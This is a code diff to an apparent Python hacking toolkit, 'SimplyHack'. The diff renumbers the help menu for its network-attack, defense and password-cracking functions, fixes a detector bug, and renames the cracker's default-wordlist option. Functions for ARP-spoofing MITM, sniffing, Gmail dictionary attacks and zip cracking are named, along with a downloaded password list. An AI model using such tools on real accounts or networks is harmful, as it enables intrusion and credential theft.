@@ -1,7 +1,7 @@
 #!/usr/bin/env python3
 
 # Package Name             : SimplyHack
-# Version                  : 0.0.7
+# Version                  : 0.0.10
 # Author                   : Abhishek Dangat
 # Programming Language     : Python 3.9.7
 # Contact                  :
@@ -105,20 +105,20 @@ def help():
     print("\n[" + lightred + "Reconnaissance" + reset + "]")
     print("\n[" + lightgreen + "1" + reset + "] - [" + lightgreen + "Subdomain Scanning" + reset + "] - simplyhack.subdomain_scan(" + lightgreen + "domain" + reset + "=" + lightred + '"example.com"' + reset + ", " + lightgreen + "protocol" + reset + "=" + lightred + '"http"' + reset + "/" + lightred + '"https"' + reset + ", " + lightgreen + "wordlist" + reset + "=" + lightred + '"default"' + reset + " OR " + lightgreen + "wordlist" + reset + "=" + lightred + '"wordlist.txt"' + reset + ")")
     print("[" + lightgreen + "2" + reset + "] - [" + lightgreen + "Directory Discovery" + reset + "] - simplyhack.directory_scan(" + lightgreen + "domain" + reset + "=" + lightred + '"example.com"' + reset + ", " + lightgreen + "wordlist" + reset + "=" + lightred + '"default"' + reset + " OR " + lightred + '"wordlist.txt"' + reset + ")")
-    print("[" + lightgreen + "4" + reset + "] - [" + lightgreen + "Web Spider" + reset + "] - simplyhack.web_spider(" + lightgreen + "url" + reset + "=" + lightred + '"<target URL>"' + reset + ")")
-    print("[" + lightgreen + "3" + reset + "] - [" + lightgreen + "DNS Lookup" + reset + "] - simplyhack.dns_lookup(" + lightgreen + "url" + reset + "=" + lightred + '"example.com"' + reset + ")")
-    print("[" + lightgreen + "4" + reset + "] - [" + lightgreen + "Reverse DNS Lookup" + reset + "] - simplyhack.reverse_dns_lookup(" + lightgreen + "ip" + reset + "=" + lightred + '"<target IPv4>"' + reset + ")")
-    print("[" + lightgreen + "5" + reset + "] - [" + lightgreen + "Local Network Scanning" + reset + "] - simplyhack.local_scan(" + lightgreen + "targetIP" + reset + "=" + lightred + '"<target IPv4>"' + reset + ")")
+    print("[" + lightgreen + "3" + reset + "] - [" + lightgreen + "Web Spider" + reset + "] - simplyhack.web_spider(" + lightgreen + "url" + reset + "=" + lightred + '"<target URL>"' + reset + ")")
+    print("[" + lightgreen + "4" + reset + "] - [" + lightgreen + "DNS Lookup" + reset + "] - simplyhack.dns_lookup(" + lightgreen + "url" + reset + "=" + lightred + '"example.com"' + reset + ")")
+    print("[" + lightgreen + "5" + reset + "] - [" + lightgreen + "Reverse DNS Lookup" + reset + "] - simplyhack.reverse_dns_lookup(" + lightgreen + "ip" + reset + "=" + lightred + '"<target IPv4>"' + reset + ")")
+    print("[" + lightgreen + "6" + reset + "] - [" + lightgreen + "Local Network Scanning" + reset + "] - simplyhack.local_scan(" + lightgreen + "targetIP" + reset + "=" + lightred + '"<target IPv4>"' + reset + ")")
 
     print("\n\n\n[" + lightred + "Network Attacks" + reset + "]")
     print("\n[" + lightgreen + "1" + reset + "] - [" + lightgreen + "MITM (ARP Spoofing)" + reset + "] - simplyhack.arp_spoof(" + lightgreen + "routerIP" + reset + "=" + lightred + '"<router IPv4>"' + reset + ", " + lightgreen + "targetIP" + reset + "=" + lightred + '"<target IPv4>"' + reset + ")")
     print("[" + lightgreen + "2" + reset + "] - [" + lightgreen + "MITM (Packet Sniffing)" + reset + "] - simplyhack.sniff_packets(" + lightgreen + "interface" + reset + "=" + lightred + '"<your interface>"' + reset + ")")
-    print("[" + lightgreen + "4" + reset + "] - [" + lightgreen + "Local Network Scanning" + reset + "] - simplyhack.local_scan(" + lightgreen + "targetIP" + reset + "=" + lightred + '"<target IPv4>"' + reset + ")")
-    print("[" + lightgreen + "5" + reset + "] - [" + lightgreen + "MAC Changer" + reset + "] - simplyhack.change_mac_address(" + lightgreen + "interface" + reset + "=" + lightred + '"<Your Interface>"' + reset + ", " + lightgreen + "new_mac" + reset + "=" + lightred + '"rand OR <new MAC>"' + reset + ", " + lightgreen + "ischeck" + reset + "=" + lightred + '"TRUE/FALSE"' + reset + ")")
+    print("[" + lightgreen + "3" + reset + "] - [" + lightgreen + "Local Network Scanning" + reset + "] - simplyhack.local_scan(" + lightgreen + "targetIP" + reset + "=" + lightred + '"<target IPv4>"' + reset + ")")
+    print("[" + lightgreen + "4" + reset + "] - [" + lightgreen + "MAC Changer" + reset + "] - simplyhack.change_mac_address(" + lightgreen + "interface" + reset + "=" + lightred + '"<Your Interface>"' + reset + ", " + lightgreen + "new_mac" + reset + "=" + lightred + '"rand OR <new MAC>"' + reset + ", " + lightgreen + "ischeck" + reset + "=" + lightred + '"TRUE/FALSE"' + reset + ")")
     
     print("\n\n\n[" + lightred + "Defense" + reset + "]")
-    print("\n[" + lightgreen + "3" + reset + "] - [" + lightgreen + "Network Intrusion Detection System (IDS)" + reset + "] - simplyhack.network_ids(" + lightgreen + "interface" + reset + "=" + lightred + '"<your interface>"' + reset + ")")
-    print("[" + lightgreen + "3" + reset + "] - [" + lightgreen + "Endpoint Intrusion Detection System (IDS)" + reset + "] - simplyhack.endpoint_ids()")
+    print("\n[" + lightgreen + "1" + reset + "] - [" + lightgreen + "Network Intrusion Detection System (IDS)" + reset + "] - simplyhack.network_ids(" + lightgreen + "interface" + reset + "=" + lightred + '"<your interface>"' + reset + ")")
+    print("[" + lightgreen + "2" + reset + "] - [" + lightgreen + "Endpoint Intrusion Detection System (IDS)" + reset + "] - simplyhack.endpoint_ids()")
 
     print("\n\n\n[" + lightred + "Password Cracking" + reset + "]")
     print("\n[" + lightgreen + "1" + reset + "] - [" + lightgreen + "Hash Cracker" + reset + "] - simplyhack.hash_crack(" + lightgreen + "hash_type" + reset + "=" + lightred + '"sha1/sha224/sha256/sha512/md5"' + reset + ", " + lightgreen + "passwordHash" + reset + "=" + lightred + '"<Password Hash>"' + reset + ", " + lightgreen + "wordlist" + reset + "=" + lightred + '"default"' + reset + " OR " + lightgreen + "wordlist" + reset + "=" + lightred + '"wordlist.txt"' + reset + ")")
@@ -629,13 +629,13 @@ def network_ids(interface):
     scapy.sniff(iface=interface, store=False, prn=detect_netattack_back)
 
 def detect_netattack_back(networkPacket):
-    if networkPacket.haslayer(scapy.ARP) and packet[scapy.ARP].op == 2:
+    if networkPacket.haslayer(scapy.ARP) and networkPacket[scapy.ARP].op == 2:
         try:
             realMAC_ADDRESS = get_TargetMAC_Address(networkPacket[scapy.ARP].psrc)
             MACinResponse   = networkPacket[scapy.ARP].hwsrc
 
             if realMAC_ADDRESS != MACinResponse:
-                print("[" + lightred + "ALERT" + reset + "] - " + lightred + "ARP Spoofing detected" + reset)
+                print("[" + lightred + "ALERT" + reset + "] - " + lightred + "MITM attack detected" + reset)
         except IndexError:
             pass
 
@@ -958,7 +958,7 @@ def gmail_dictatk(target_gmail, wordlist):
     print("\n[" + lightred + "-" + reset + "] " + lightred + "Password not found in the wordlist" + reset)
 
 def crack_passprotected(filetype, file_path, wordlist):
-    if wordlist == "rand":
+    if wordlist == "default":
         if filetype == "zip":
             zipFileObject = zipfile.ZipFile(file_path)
             wordlist = str(urllib.request.urlopen("https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt").read(), 'utf-8')
@@ -984,7 +984,7 @@ def crack_passprotected(filetype, file_path, wordlist):
                         #passwordsTried = passwordsTried + 1
                         time.sleep(0.0000001)
                         continue
-    elif wordlist != "rand":
+    elif wordlist != "default":
         if filetype == "zip":
             zipFileObject = zipfile.ZipFile(file_path)
             with open(wordlist) as wordlist:
